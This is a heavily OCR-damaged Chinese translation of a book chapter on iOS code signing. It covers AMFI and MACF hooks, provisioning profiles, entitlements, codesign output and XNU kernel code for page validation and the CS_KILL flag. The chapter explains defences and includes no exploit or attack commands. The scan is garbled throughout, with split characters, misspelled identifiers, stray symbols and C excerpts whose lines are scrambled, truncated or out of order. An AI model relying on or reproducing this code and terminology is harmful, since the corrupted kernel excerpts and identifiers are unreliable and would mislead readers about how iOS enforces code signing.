的 男 一 常见 举动 )， 因 为 它 不 会 被 签名 。 而 对 于 不 含 任何 代码 签名 机 制 的 安 章 系统 而 言 ， 攻 击 者 
很 容易 在 禁用 DEP 之 后 于 进程 内 执行 他 们 的 shellcode ， 或 是 利用 ROP 向 磁盘 写 和 二进制 文件 并 执 
行 这 些 文件 。 

本 章 要 讨论 签名 证 书 、 授 权 描 述 文件 ( provisioning profile )、 已 签名 代码 、 特 权 ， 以 及 它们 
对 攻击 者 的 影响 。 
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4.1 强制 访问 控制 


从 底层 来 看 ， 强 制 代码 签名 机 制 大 部 分 是 由 MACF ( Mandatory Access Control Framework， 
强制 访问 控制 框架 ) 控制 的 。 在 介绍 完 它 的 工作 原理 之 后 ， 我 们 要 回 过 头 来 说 明 如 何 利 用 MACF 
策略 执行 代码 签名 检查 。 

MacOSX 和 ioOS 的 MACF 继 承 自 EreeBSD, FreeBSD 包 含 了 对 某 些 强制 访问 控制 策略 的 实验 性 
支持 , 还 含有 用 于 内 核 安 全 性 扩展 的 框架 一 一 TrustedBSD MAC Framework。 在 i0S 中 ,， MAC 框架 
是 种 可 插入 的 访问 控制 框架 , 允许 新 的 安全 策略 方便 地 链接 到 内 核 、 在 启动 时 载 和 或 是 在 运行 时 
动态 加 载 。 该 框架 提供 了 多 种 功能 ， 从 而 更 容易 实现 新 的 安全 策略 ,包括 方便 地 为 系统 对 象 标 记 
安全 标签 ( 比如 “机 密 信息 ”)。 

iOS 只 注册 了 两 项 MAC 策 略 : AMFI 和 沙 盒 。 查 看 mac_policy_registezr 的 xrefs 我 们 就 能 
获得 这 些 信息 ， 如 图 4-1 所 示 。 第 5 章 将 介绍 沙 盒 MAC 策 略 。 接 下 来 我 们 简单 看 看 AMFI。 
























































图 4-1 只 有 两 个 函数 注册 了 MAC 策 略 


4.1.1 AMFI 钧 子 








AMFI 代 表 AppleMobileFileIntegrity ( 苹果 移动 设备 文件 完整 性 )。 当 我 们 在 内 核 二 进 制 文件 
中 查看 对 mac_policy_registezr 的 调用 时 ， 就 会 看 到 AMFI 设 置 的 所 有 钩子 ， 见 图 4-2。 
AMFI 用 到 了 以 下 MAC 钩 子 : 


口 mpo_vnode check_ signature 














DQ mpo_vnode check exec 





D mpo_proc get_ task_ name 





D mpo_proc check run cs valid 





D mpo_cred label init 
D mpo_cred label associate 


D mpo_cred check_ label update execve 





D mpo_cred label pudate execve 





D mpo_cred label destroy 





D mpo_reserved10 


本 章 要 讨论 如 何 反 编 译 其 中 的 某 些 钩子 。 当 然 ， 它 们 对 于 代码 签名 而 言 都 是 很 重要 的 。 
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图 4-2 AMFI 利 用 内 核 注册 它 的 钩子 


4.1.2 AMFI 和 execv 





这 里 以 很 容易 理解 的 mpo_vnode_check_exec 为 例 介 绍 如 何 访问 和 构建 AMFI 钧 子 。XNU 
内 核 源 的 bsd/kern/kern_exec.c 文 件 中 存在 名 为 exec_check_permissions 的 函数 ,注释 中 的 描述 
是 这 样 的 : ” 

/* 


* exec_ check permissions 
大 





* Description: Verify that the file that is being attempted to be 


executed 

类 is in fact allowed to be executed based on it POSIX 
file 

杰 permissions and other access control criteria 


在 exec_check_permissions 中 大 家 可 以 看 到 : 


#if CONFIG MACF 
error = mac_ vnode check exec (imgp->ip_vfs_ context, vp, imgp); 
if (error) 
return (error); 
#endif 














r 





Qa 描述 的 意思 是 验证 试图 执行 的 文件 依据 POSIX 文 件 许可 和 其 他 访问 控制 标准 其 实 是 允许 执行 的 。 一 一 译 者 注 
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而 mac_vnode_check_exec 基 本 上 是 MAc_CHECK 宏 的 包装 器 ; 





Lit 

mac_vnode _ check _ exec(vfs_ context_t ctx, struct vnode *vp, 
struct image params *imgp) 

{ 
kauth _ cred t cred; 
int error; 


if (!mac_vnode _ enforce || !mac_proc_enforce) 
return (0); 


cred = vfs_context_ ucred (ctx); 
MAC_CHECK (vnode_check exec, cred, vp, vp->v_label, 














imgp != NULL) ? imgp->ip_execlabelp : NULL, 
(imgp != NULL) ? &imgp->ip_ndp->ni_cnd : NULL, 
(imgp != NULL) ? &imgp->ip_csflags : NULL); 








return (error); 


} 
MAC_CHECK 是 所 有 MACF 代 码 都 会 用 到 的 通用 宏 ， 可 以 在 security/mac_internal.h 中 找到 。 








* MAC_CHECK performs the designated check by walking the policy 
* module list and checking with each as to how it feels about the 
* request. Note that it returns its value via 'error' in the scope 
* of the caller. 





error = mac_error_select!( 
mpc->mpc_ops->mpo_ ## check (args), 
error); 


#define MAC _ CHECK(check, args...) do { \ 
struct mac_ policy_conf *mpc; \ 
Wn \ 

\ 

error = 0; \ 

for (i = 0; i < mac policy list.staticmax; i++) { N 

mpc = mac policy list.entries[i].mpc; x 

if (mpc == NULL) \ 

continue; \ 

\ 

if (mpc->mpc_ops->mpo_ ## check != NULL) \ 

\ 

\ 

\ 


} 


这 段 代 码 会 检查 策略 列表 ， 对 于 已 加 载 的 各 模块 ， 如 果 为 其 注册 了 钧 子 ， 它 就 会 调用 相应 的 
钧 子 。 在 这 里 ， 被 调用 的 是 为 mpo_vnodqe_check_exec 注 册 的 函数 。 这 样 ， 只 要 二 进 制 文件 要 
开始 执行 ,我 们 就 会 检测 代码 签名 。 
挂 多 是 放 在 xnu 开 源 包 中 的 ， 但 实际 的 钩子 却 在 内 核 二 进 制 文件 中 。 大 家 可 以 查看 如 图 4-3 所 
示 的 mpo_vnode_check_exec 的 反 编 译 代码 ， 看 看 它 钓 住 的 函数 到 底 是 什么 。 
我 要 真有 AppleMobileFileIntegrity.cpp 文 件 就 好 了 ! 不 管 怎样 , 该 函数 的 唯一 职责 就 是 为 启动 
的 每 个 进程 设置 cs_HARD 和 cSs_KILL 标 志 。 看 看 bsd/sys/codesign.h 文 件 ， 你 就 会 发 现 这 些 标志 告 
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诉 内 核 不 要 加 载 任何 无 效 页 , 并 告诉 内 核 关闭 那些 将 要 无 效 的 进程 。 这 对 于 你 之 后 学 习 代 码 签名 
实际 的 实施 机 制 而 言 很 重要 。 














图 4-3”amfi_vnode_check_exec 的 反 编 译 代 人 码 








4.2 授权 的 工作 原理 4 


鉴于 开发 者 需要 在 设备 上 测试 应 用 ,而 企业 希望 只 向 内 部 的 设备 发 布 应 用 , 我 们 就 需要 有 为 
设备 越狱 之 外 的 办 法 让 未 经 苹果 公司 签名 的 应 用 在 iOS 设 备 上 运行 。 允许 这 样 做 的 方法 就 是 授权 。 
个 人 、 公司 、 企 业 或 大 学 都 可 以 加 入 苹果 公司 为 达到 这 一 目的 而 提供 的 计划 。 在 本 书 中 ,我 们 是 
从 作为 OS 开发 者 计划 成 员 的 独立 开发 者 的 角度 来 介绍 的 ， 不 过 其 他 情况 也 是 非常 类 似 的 。 

作为 该 计划 的 一 部 分 , 每 个 开发 者 都 会 用 本 地 生成 的 一 组 私 钥 申请 开发 证 书 和 发 布 证 书 。 然 
后 ， 苹 果 公司 会 向 开发 者 提供 这 两 份 证 书 ， 见 图 4-4。 























图 4-4 iOS 开发 者 证 书 和 发 布 证 书 





4.2.1 理解 授权 描述 文件 
这 些 证 书 可 以 证 明 开 发 者 的 身份 , 因为 只 有 开发 者 才 有 对 应 它们 的 私 钥 。 它们 本 身 并 没有 太 
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多 价值 。 奥 妙 就 在 授权 描述 文件 里 。 通 过 iOS Developer Portal (iOS 开 发 者 门户 )， 大 家 可 以 生成 


授权 描述 文件 。 授 权 描 述 文件 是 由 苹果 公司 签名 的 plist 文 件 。 该 plist 文 件 列 出 了 证 书 、 设 备 和 特 
权 。 当 该 授权 描述 文件 被 安装 到 它 列 出 的 某 个 设备 上 时 ,就 会 列 出 包括 苹果 公司 的 证 书 在 内 的 所 


2 


有 可 以 为 在 该 设备 上 运行 




















权 。 我 们 将 在 4.4 节 探讨 特权 。 


独立 开发 者 账户 与 企业 账户 之 间 的 一 个 主要 区 别 在 于 独立 开发 者 授权 描述 文件 必须 列 出 


的 代码 签名 的 证 书 。 它 还 列 出 由 该 描述 文件 签名 的 应 用 可 以 使 用 的 特 


1 有 具 


I 


体 的 设备 。 另 一 个 不 同 就 是 独立 开发 者 账户 限制 开发 者 最 多 使 用 100 部 设备 ， 而 企业 则 可 以 让 蔷 
果 公司 生成 未 锁定 到 特定 设备 并 可 以 安装 到 任何 设备 上 的 授权 描述 文件 。 
考虑 如 下 授权 描述 文件 : 


<!DOCTYPE plist 











PUBLIC "-//Apple//DTD PLIST 1.0//EN" 


"http:/ /www.apple.com/DTDS/PropertyList-1.0.dqtd"> 
<plist version="1.0"> 


<dict> 


<key>ApplicationIidentifierPprefix</key> 


<array> 


<string>MCC6DSFVWZ</string> 


</array> 

<key>CreationDate</key> 
<date>2011-08-12T20:09:00Z</date> 
<key>DeveloperCertificates</key> 


<array> 


<data> 


MIIEFbTCCBFWgAwIBAgIITvJgD921rCQOwDQYUKo2ZIhvcNAQEFBQAwG2ZYxCZzAJ 





</data> 


</array> 
<key>Entitlements</key> 





<Aiet> 


< Alot 





<key>application-identifier</key> 
<string>MCC6DSFVWZ.*</string> 
<key>com.apple.developer.ubiquity-container-identifiers</key> 
<array> 

<string>MCC6DSFVWZ.*</string> 
</array> 
<key>com.apple.developer.ubiquity-kvstore-identifier</key> 
<string>MCC6DSFVWZ.*</string> 
<key>get-task-allow</key> 
<true/> 
<key>keychain-access-groups</key> 
<array> 

<string>MCC6DSFVWZ.*</string> 
</array> 


<key>ExpirationDate</key> 
<date>2011-11-10T20:09:00Z</date> 
<key>Name</key> 
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<string>iphone_payloads Charlie Miller iPhone 4 regular pho</string> 
<key>ProvisionedDevices</key> 
<array> 
<string>7ec077ddb5826358.... .c046f619</string> 
</array> 
<key>TeamIdentifier</key> 
<array> 
<string>MCC6DSFVWZ</string> 
</array> 
<key>TimeToLive</key> 
<integer>90</integer> 
<key>UUID</key> 
<string>87C4CE1E-D87B-4037-95D2-8..9246</string> 
<key>Version</key> 
<integer>1</integer> 
</dicES 
</plist> 


在 前 面 这 个 授权 描述 文件 中 ， 我 们 要 注意 ApplicationIdentifierPrefix， 它 让 同一 开 
发 者 编写 的 不 同 应 用 能 共享 数据 。 接 下 来 是 创建 日 期 ， 后面 跟着 base64 编 码 的 证 书 。 如 果 你 想 知 
道 该 字段 的 内 容 ， 请 把 它 放 到 文本 文件 中 ， 并 用 OpenSSL 查 看 。 大 家 需要 在 这 部 分 内 容 之 前 加 上 
SSE BEGIN CERTIFICATE-----， 并 在 文件 末尾 加 上 -----END CERTIFICATE-----。 然 后 ， 
你 就 可 以 利用 openss1 阅 读 证 书 的 内 容 了 ， 如 下 所 示 。 


$ openssl x509 -in /tmp/foo -text 
Certificate: 
Data: 
Version: 3 (0x2) 
Serial Number: 
4e:f8:e0:0f:d6:75:ac:24 
Signature Algorithm: shalWithRSAEncryption 
Issuer: C=US, O=Apple Inc., OU=Apple Worldwide Developer Relations, CN=Apple 
Worldwide Developer Relations Certification Authority 
Validity 
Not Before: Jun 1 01:44:30 2011 GMT 
Not After : May 31 01:44:30 2012 GMT 
Subject: UID=7CCDL7Y8ZZ, CN=iPhone Developer: Charles Miller (7URR5G4CD1), 


























Subject Public Key Info: 
Public Key Algorithm: rsaEncryption 








接 下 来 是 Entitlements 部 分 ， 它 列 出 了 由 该 证 书签 名 的 应 用 可 以 具有 的 特权 。 在 这 里 ,该 证 
书签 名 的 应 用 可 以 使 用 指定 的 keychain 和 应 用 标识 符 ， 并 具有 调试 进程 必需 的 
get-task-allow。 该 授权 描述 文件 还 含有 失效 日 期 、 自 身 的 名 称 ， 并 列 出 了 可 使 用 该 描述 文 
件 的 设备 的 UUID。 

在 iOS 设 备 上 , 大 家 可 以 在 Settings (设置 ) 一 General ( 通用 ) 一 Profiles ( 描述 文件 见 图 4-5 ) 
或 文件 系统 的 /var/MobileDevice/ProvisioningProfiles/ 位 置 找 到 安装 的 描述 文件 。 
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alAr&T 会 9:35 PM 六 EB 


General Profiles 
SI Team Provisioning Profi...> 
md EXpires Nov 22, 2011 


Rm A iphone_payloads Charli... > 
mg Expires Nov 10, 2011 




















图 4-5 ”设备 上 的 描述 文件 列表 


4.2.2 如何 验证 授权 文件 的 有 效 性 


授权 描述 文件 的 有 效 性 是 由 可 在 dylq_shareaq_cache 中 找到 的 Libmis 动 态 库 中 的 
MISProvisioningProfilecheckValidity 困 数 验 证 的 。 大 家 随后 还 会 见 到 这 一 重要 的 动态 
库 。 在 认可 授权 描述 文件 之 前 ， 该 函数 会 验证 该 文件 的 如 下 信息 : 
口 签名 证 书 必须 是 由 Apple iPhone Certificate Authority ( 苹果 iPhone 证 书 管 理 机 构 ) 签发 的 ; 
口 签名 证 书 的 名 称 必须 是 Apple iPhone OS Provisioning Profile Signing; 

口 证 书 的 签名 链 不 能 长 于 3 个 链接 ; 

口 根 证 书 必须 具 有 特定 的 SHA1 散 列 值 ; 

口 描述 文件 的 版 本 号 一 定 是 1; 

口 设备 的 UDID 一 定 要 出 现 ， 或 者 该 描述 文件 必须 包含 ProvisionsAllDevices 键 ; 
口 该 描述 文件 一 定 没 有 过 期 。 


4.3 理解 应 用 签 


Xcode 可 用 来 为 开发 者 将 要 使 用 的 应 用 签名 。 这 些 应 用 只 能 在 与 授权 描述 文件 关联 的 设备 上 
运行 。 如 有 果 用 codesign 工 具 查 看 这 样 的 应 用 ， 你 就 会 知道 原因 : 


$ codesign -dvvv test-dyld.app 
Executable=/Users/cmiller/Library/Developer/Xcode/DerivedData/ip 
hone-payload/Products/Debug-iphoneos/test-dyld.app/test-dyld 
Identifier=Accuvant.test-dyld 
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Format=bundle with Mach-Oo thin (armv7) 

CodeDirectory v=20100 size=287 flags=0x0 (none) hashes=6+5 
location=embedded 

Hash type=shal size=20 
CDHash=977d68fb31cfbb255da01b401455292a5f89843c 

Signature size=4287 


Authority=iPhone Developer: Charles Miller (7URR5G4CD1) 


Authority=Apple Worldwide Developer Relations Certification 
Authority 

Authority=Apple Root CA 

Signed Time=Sep 9, 2011 3:30:50 PM 

Info.plist entries=26 

Sealed Resources rules=3 files=5 

Internal requirements count=1 size=208 


这 上段 代码 表明 该 应 用 是 由 独立 开发 者 Charles Miller 签 名 的 。 没 有 相应 授权 描述 文件 的 iOS 
设备 是 不 能 运行 该 应 用 的 。 如 果 该 应 用 被 提交 到 苹果 的 App Store， 而 且 获 得 批准 ,苹果 公司 就 Ee 
会 为 其 签名 并 让 其 上 架 供 用 户 下 载 。 这 种 情况 下 ， 它 就 可 以 在 任何 iOS 设 备 上 运行 了 ， 大 家 可 
以 看 到 : 


$ codesign -dvvv AngryBirds.app 

Executable=/Users/cmiller/book/iphone- 

book2/AngryBirds.app/AngryBirds 

Identifier=com.clickgamer.AngryBirds 

Format=bundle with Mach-O thin (armv6) 

CodeDirectory v=20100 size=19454 flags=0x0 (none) hashes=964+5 
location=embedded 

Hash type=shal size=20 

CDHash=8d41c1d2f2fledc5cd66b2ee8ba582f1d41163ac 
Signature size=3582 

Authority=Apple iPhone OS Application Signing 

Authority=Apple iPhone Certification Authority 

Authority=Apple Root CA 

Signed Time=Jul 25, 2011 6:43:55 AM 

Info.plist entries=29 

Sealed Resources rules=5 files=694 

Internal requirements count=2 size=320 


现在 ， 该 应 用 已 经 由 Apple iPhone OS Application Signing 机 构 签 名 了 ， 默 认 情 况 下 所 有 iOS 设 
人 

iPhone 上 自 带 的 可 执行 文件 可 以 与 App Store 上 的 应 用 使 用 相同 的 签名 方式 。 不 过 ,通常 情况 
下 它们 是 用 如 下 所 示 的 点 对 点 (ad hoc ) 方法 签名 的 : 


$ codesign -dvvv CommCenter 
Executable=/Users/cmiller/book/iphone-book2/CommCenter 
Identifier=com.apple.CommCenter 

Format=Mach-O thin (armv7) 

CodeDirectory v=20100 size=6429 flags=0x2(adhoc) hashes=313+5 
location=embedded 

Hash type=shal size=20 
CDHash=5ce2b6ddef23ac9fcd0dc5b873c7d97dc31ca3ba 
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Signature=adhoc 

Info.plist=not bound 

Sealed Resources=none 

Internal requirements count=1 size=332 


该 可 执行 文件 无 法 单独 执行 ,因为 它 没有 经 过 签名 。 不 过 ， 正 如 大 家 很 快 会 看 到 的 , 除了 具 








备 特定 签名 , 还 有 其 他 方法 让 代码 受到 信任 。 在 这 里 , 该 二 进 制 文件 的 散 列 是 被 烧 录 到 位 于 内 核 


的 静态 受信 任 缓存 中 的 。 如 果 可 执行 文件 的 散 列 出 现在 蒋 态 受信 任 绥 存 中 , 它们 就 自动 被 允许 执 





行 ， 就 像 是 具备 有 效 且 被 认可 的 签名 那样 。 


4.4 深入 了 解 特权 





经 过 签名 的 应 用 也 可 能 含有 plist 文 件 ， 该 文件 指定 了 授予 该 应 用 的 一 组 特权 。 大 家 可 以 利用 


Saur 这 编写 的 1daidq 工 具 列 出 给 定 应 用 的 特权 : 


# ldid -e AngryBirds 
<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" 
"http://www.apple.com/DTDs/PropertyList-1.0.dtd"> 
<plist version="1.0"> 
<dict> 

<key>application-identifier</key> 








<string>G8PVV3624J.com.clickgamer.AngryBirds</string> 


<key>aps-environment</key> 
<stringSproduction</strirng> 
<key>keychain-access-groups</key> 
<array> 


<string>G8PVV3624J.com.clickgamer.AngryBirds</string> 


</array> 
</dict> 
</plist> 








应 用 标识 符 为 各 应 用 提供 了 唯一 的 前 级 。keychain-access( 钥匙 串 访问 ) 群 组 为 应 用 提供 了 
保障 数据 安全 的 途径 。 而 特权 则 提供 了 这 样 一 种 机 制 , 在 以 相同 用 户 身份 运行 并 且 具 有 相同 沙 盒 

















规则 的 情况 下 ， 它 可 以 让 某 些 应 用 比 其 他 应 用 具有 更 多 或 更 少 权 限 。 
这 些 可 以 赋予 的 特权 都 是 授权 描述 文件 中 的 函数 , 所 以 苹果 公司 不 仅 
且 能 限制 特定 开发 者 编写 的 所 有 应 用 的 功能 。 

再 看 一 个 例子 ， 考 虑 iOS SDK 中 附带 的 GNU 调 试 器 gdb: 

ldid -e /usr/bin/gdb 

<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" 


"http://www.apple.com/DTDs/PropertyList-1.0.dtd"> 
<plist version="1.0"> 














<OlGt> 
<key>com.apple.springboard.debugapplications</key> 
<true/> 
<key>get-task-allow</key> 
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此 外 ， 正 如 之 前 讨论 过 的 ， 





能 限制 某 些 应 用 的 功能 ， 
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<true/> 
<key>task_for pid-allow</key> 
<true/> 

</dict> 

</plist> 


大 家 会 发 现 gdb 有 一 些 额 外 的 特权 ， 这些 特权 是 gdb 调 试 其 他 应 用 所 必需 的 。 大 家 会 在 4.6 节 
了 解 到 男 一 项 特权 一 一 动态 代码 签名 。 


4.5 代码 签名 的 实施 方法 


代码 签名 的 执行 实际 发 生 在 内 核 的 虚拟 内 存 系统 中 。 系统 会 检查 独立 的 内 存 页 以 及 已 经 作为 
整体 的 进程 ， 看 看 它们 是 否 起 源 于 经 过 签名 的 代码 。 


4.5.1 收集 和 验证 签名 信息 


在 加 载 可 执行 代码 时 ， 内 核 会 检查 这 些 代 码 是 否 含 有 与 DC_CODE_STGNATURE 装 载 命令 存储 
在 一 起 的 代码 签名 : 
$ otool -1 CommCenter | grep -A 5 SIGN 
cmd LC_CODE_SIGNATURE 
cmdsize 16 


dataoff 1280832 
datasize 7424 


XNU 的 bsd/kern/mach loaderc 中 的 内 核 代 码 会 在 parse_machfile 国 数 中 查找 并 解析 代码 
签名 : 


parse machfilel( 























struct vnode *vp, 

vm map_t map, 
thread_t thread, 
struct mach header *header, 

全 上 下 -< 禄 file_ offset, 
GEE macho_size, 
ti depth, 

int64 七 aslr_offset, 
load_ result_t *result 


case LC_CODE SIGNATURE: 
/* 代 码 签名 */ 








ret = load code signaturel( 
(struct linkedit data command *) lcp, 
vp, 
Ei le Offget, 
macho_size, 
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header->cputype, 
(depth == 1) ? result : NULL); 


签名 的 实际 装载 过 程 实在 lo0ag_code_signature 限 数 中 执行 的 : 


static load return 七 
load_code_signaturel( 
struct linkedit_ data commangd *lcp, 


struct vnode be 

oh ns macho_offset, 
off_t macho_size, 
pu type.t cputype,; 

load result_t *result) 


kr = ubc_ cs_blob allocate(&addr, &blob size); 


ubc_cs_blob addl(vp, 
cputype, 
macho_offset, 
addr, 
lcp->datasize)) 


而 且 ，ubc_cs_blob_add 也 数 会 检查 该 签名 是 否 被 认可 : 








Ln 
ubc_cs_blob add( 
struct vnode ey, 
cpu_type_t cputype, 
从 二 上 = 书 base_offset, 
vm_address_t addr, 
vm_size_t size) 
{ 
/* 
* 让 策略 模块 检查 该 blob 的 签名 是 否 被 接受 
Se 


#if CONFIG MACF 
error = mac vnode check signature(vp, blob->csb_ shal, 
(void*)addr, size); 
if (error) 
goto out; 
#endif 


最 后 ，AMFI 会 在 挂钩 函数 vnode_check_signature 中 执行 实际 的 代码 签名 检查 。 图 4-6 展 
示 了 该 函数 的 反 编 译 代 码 。 

图 4-6 所 示 的 代码 会 检查 受信 任 缓存 ， 如 果 在 这 些 缓存 中 没 法 确定 这 些 代码 是 受信 任 的 ， 
就 会 调 出 用 户 空 间 守 护 进程 ， 确 定 这 些 代码 是 否 具 有 正确 的 签名 。 图 4-7 展 示 了 静态 受信 任 
缓存 。 
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图 4-6 amfi_vnode_check_signature 的 反 编 译 代码 























图 4-7 检查 静态 受信 任 缓存 的 代码 的 反 编译 代码 
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静态 受信 任 缓存 实际 上 是 包含 在 内 核 中 的 。 大 家 可 以 用 IDA Pro 查 看 它 ( 见 图 4-8 )。 

















图 4-8 ”内 核 中 的 静态 受信 任 缓存 


除了 受信 任 数据 是 动态 加 载 的 〈 而 非 静 态 的 )， 动 态 受 信任 缓存 的 检查 与 此 类 似 。 对 于 那些 
未 处 在 这 两 种 缓存 中 的 项 来 说 ， 若 其 代码 签名 是 有 效 的 ， AMFI 会 用 Mach RPC 询 问 用 户 空间 守护 
进程 amfid。amfid 有 两 个 可 通过 Mach RPC 访 问 的 子 程序 。 在 vnode_check_signature 中 调用 的 
那个 子 程序 是 verify_code_directorv。 该 函数 会 调用 libmis.dylib 中 的 MISsvalidateSignature,， 
而 MISValidateSignature 会 调用 Security Framework ( 安全 框架 ) 中 的 SeccMSvVverify 进 行 实 
际 的 验证 。 























4.5.2 ”如 何在 进程 上 实施 签 


各 进程 的 代码 签名 有 效 性 会 被 记录 在 内 核 proc 结 构 的 csflags 成 员 中 。 例 如 ， 只 要 出 现 页 
错误 ， vm_fault 函 数 就 会 被 调用 。vm_fault_entez 会 调用 负责 检查 可 执行 页 代码 签名 的 函数 。 
注意 ， 只 要 分 页 被 装载 到 虚拟 内 存 系 统 中 ( 包括 初次 装载 时 )， 就 会 产生 页 错误 。 

要 查看 负责 进行 该 检查 的 代码 ， 请 查看 ./osfmk/vm/vm fault.c 中 的 vm_fault: 














kern_ return 七 


vm fault( 
Vn maDp 七 map, 
vm map_offset_t vaddr, 
vm prot_t fault_type, 
boolean 七 change_wiring, 
it: interruptible, 
pmap_t caller_pmap, 


vm map_offset_t caller pmap_addr) 
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kr = vm_fault_enter (m， 
pmap, 
vaddr, 
Drot., 
fault_type, 
wired, 
change_ wiring, 
fault_info.no_cache, 
fault_info.cs_bypass, 
&type_of_fault); 





而 且 ， 在 vm_fault_enter 中 你 可 以 看 到 : 





vm fault_enter(vm page 七 m, 
pmap_t pmap, 
vm map_offset_t vaddr, 
vm prot 七 prot, 
vm prot_t fault_type, 
boolean t wired, 





boolean t change wiring, 
boolean 七 no_cache, 
boolean t cs_bypass, 
int xtype_of fault) 





/* 如 果 需 要 的 话 ， 验 证 代码 签名 */ 
if (VM _ FAULT _ NEED CS_ VALIDATION(pmap, m)) { 
vm _ object_lock assert exclusive(m->object); 

















if (m->cs_validated) { 
vm_cs_revalidates++; 
} 


vm page_validate cs (m); 


if (m->cs_tainteqd || 
(( !cs_enforcement_disable && !cs_bypass ) && 
((!m->cs_validated && (prot & VM_ PROT EXECUTE)) || 
(page_immutable(m, prot) && 
((prot & VM_ PROT_ WRITE) || m->wpmapped))))) 

















reject page = cs_invalid page((addr64 t) vaddr); 


if (reject page) { 

/* 拒绝 受 损坏 的 页 : 终止 页 错误 */ 
kr = KERN_CODESIGN_ERROR; 
cs_enter tainted rejected++; 

















引用 的 两 个 宏 定义 如 下 : 
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* 代码 签名 : 
* 在 页 面 发 生 软 错误 时 ， 如 果 出 现 以 下 情况 则 需要 验证 该 页 : 
* 1 .该 页 被 映射 到 用 户 空间 ，; 
2. 尚未 发 现 该 页 "已 损坏 ”; 
* 3. 该 页 属于 进行 过 代码 签名 的 对 象 ; 
4. 该 页 尚未 得 到 验证 或 已 经 映射 为 可 写 














* 
/ 
#define VM FAULT_ NEED_ CS_VALIDATION (pmap, page) \ 
((pmap) != kernel pmap /*1*/ && \ 
!(page) ->cs_tainted /*2*/ && \ 
(page) ->object->code_signed /*3*/ && \ 
(!(page)->cs_validated || (page)->wpmapped /*4*/)) 
以 及 : 
#define page_ immutable(m,prot) ((m)->cs_validated) 
这 些 代 码 所 做 的 第 一 件 事 情 是 确定 分 页 行 代码 签名 验证 ,分 页 将 被 验证 是 否 未 经 








验证 、 将 变 成 可 写 、 属 于 代码 已 签名 的 对 象 ， ee s 间 。 因 此 ， 基 本 上 任何 
时 候 都 要 进行 代码 签名 验证 。 实 际 的 验证 是 在 vm_page_validate_cs 中 发 生 的 , 该 函数 会 将 所 述 
页 映射 到 内 核 空 间 进行 检查 ， 再 调用 vm_page_validate_cs_mapped， 而 vm_page_validate_ 
cs_mapped 接 着 会 对 vnode_pager_get_obj ect_c s_blobs 进 行 调用 : 























vnode pager_ get _ object cs_ blobs (...){ 





validated = cs_validate page(blobs, 
offset + object->paging_offset 
(const void *)kaddr, 
&tainted); 


page->cs_validated = validated; 
if (validated) { 
page->cs_tainted = tainted; 


} 
cs_validate_page 会 比较 存储 的 散 列 和 计算 出 的 散 列 ， 并 记录 分 页 是 否 经 过 验证 和 (或 ) 
已 损坏 。 这 里 的 “已 验证 ”表示 分 页 具有 与 之 关联 的 代码 签名 散 列 ,“ 已 损坏 ”表示 当前 计算 出 
的 散 列 与 存储 的 散 列 不 匹配 。 


cs_validate pagel 




















void *_blobs, 
memory_object_offset t page offset, 
const void *data, 
boolean 七 *tainted) 


for (blob = blobs; 
blob != NULL; 
blob = blob->csb next) { 


embedded = (const CS_SuperBlob *) blob addr; 
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cd = findCodeDirectory (embedded, lower bound, upper_bound); 
if (cd != NULL) { 
if (cd->pageSize != PAGE SHIFT || 





hash = hashes(cd, atop(offset), 
lower_bound, upper_bound); 
if (hash != NULL) { 
bcopy (hash, expected hash, 
sizeof (expected hash)); 
found hash = TRUE; 





} 
break; 
if (found hash == FALSE) { 
validated = FALSE; 


*tainted = FALSE; 
} else { 








if (bcmp (expected hash, 
actual_hash, SHA]1_ RESULTLEN) != 0) { 
cs_validate page bad hash++; 
*tainted = TRUE; 
} else { 
*tainted = FALSE; 

















} 
validated = TRUE; 





} 


return validated; 

然后 ，vm_page_validate_cs_mapped 会 标记 页 是 否 被 视 为 已 验证 和 页 结构 已 损坏 。 

接着 ,在 vm_page_enter 原 始 的 代码 片段 中 ,会 有 条 件 确 定 该 页 是 否 无 效 。 如 果 以 前 出 现 
以 下 情况 中 的 任何 一 种 ， 该 页 就 将 被 视 为 无 效 : 
口 该 页 已 损坏 ( 意味 着 它 没有 已 保存 的 散 列 ， 或 是 与 已 保存 的 散 列 不 匹配 ); 
口 代码 签名 未 关闭 ， 而 且 该 页 未 通过 验证 ( 没有 散 列 ) 且 不 可 执行 ; 
口 代码 签名 未 关闭 ， 而 且 该 页 是 不 可 变 ( 有 散 列 ) 且 可 写 的 。 

因此 ， 从 这 里 我 们 就 可 以 看 出 ,可 执行 页 需要 具有 散 列 ， 而且 要 匹配 该 散 列 。 数 据 页 不 一 定 
要 有 散 列 。 如 果 有 散 列 与 数据 页 相关 联 ， 而 且 该 页 是 可 写 的 ,那么 该 页 就 是 无 效 的 (大概 该 页 曾 
经 是 可 执行 页 )。 

在 遇 到 无 效 页 时 ， 内 核 会 检查 是 否 设置 了 cs_KILL 标 志 ， 如 果 设 置 了 该 标志 ， 就 会 终止 该 进 
程 。 我 们 看 看 接 下 来 的 cs_invalid_page 困 数 , 它 就 是 负责 这 些 行动 的 。 正 如 大 家 看 到 的 , AMFI 
会 为 所 有 的 iOS 进 程 设置 该 标志 。 因 此 ， 任 何 具有 无 效 页 的 iOS 进 程 都 会 被 终止 。Mac OS X 也 局 
用 了 代码 签名 机 制 并 会 进行 检查 ， 不 过 它 未 设置 cs_KILL 标 志 ， 因 此 不 会 强制 终止 含 无 效 页 的 
进程 : 


下 区 长 
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cs_invaliqd_ pagel 
addr64_t vaddr) 
{ 
if (p->p_csflags & CS_KILL) { 
p->p_csflags |= CS_KILLE 
proc_unlock (p); 
printf ("CODE SIGNING: 
"p=%d[%s] 
vaddr, 
cs_procs_killed++; 
psignal (p, SIGKILL); 
proc_lock (p); 





Ds 





4.5.3 iOS 如 何 确保 已 签名 页 不 发 生 改 变 


cs_invalid page (Ox%11lx): " 
honoring CS_KILL, 
p->p_pid, p->p_comm, p->p_csflags); 


final status Ox%$x\n", 


如 果 某 个 平台 要 执行 代码 签名 , 仅 在 代码 装载 时 执行 是 不 够 的 。 代 码 签名 机 制 必须 持续 地 执 
行 ， 这 样 才能 防止 已 签名 的 代码 被 算 改 ， 防 止 新 代码 被 注 和 进程 ， 并 防止 一 些 其 他 的 破坏 。iOS 





通过 不 允许 出 现 可 执行 和 可 写 人 页 满足 了 这 一 需求 


。 这样 就 可 以 防止 代码 的 修改 和 新 代码 的 动态 

















创建 (不 过 下 一 节 中 要 讲 到 的 即时 编译 是 个 例外 )。 诸 如 此 类 的 预防 措施 是 可 能 实现 的 ， 因 为 内 
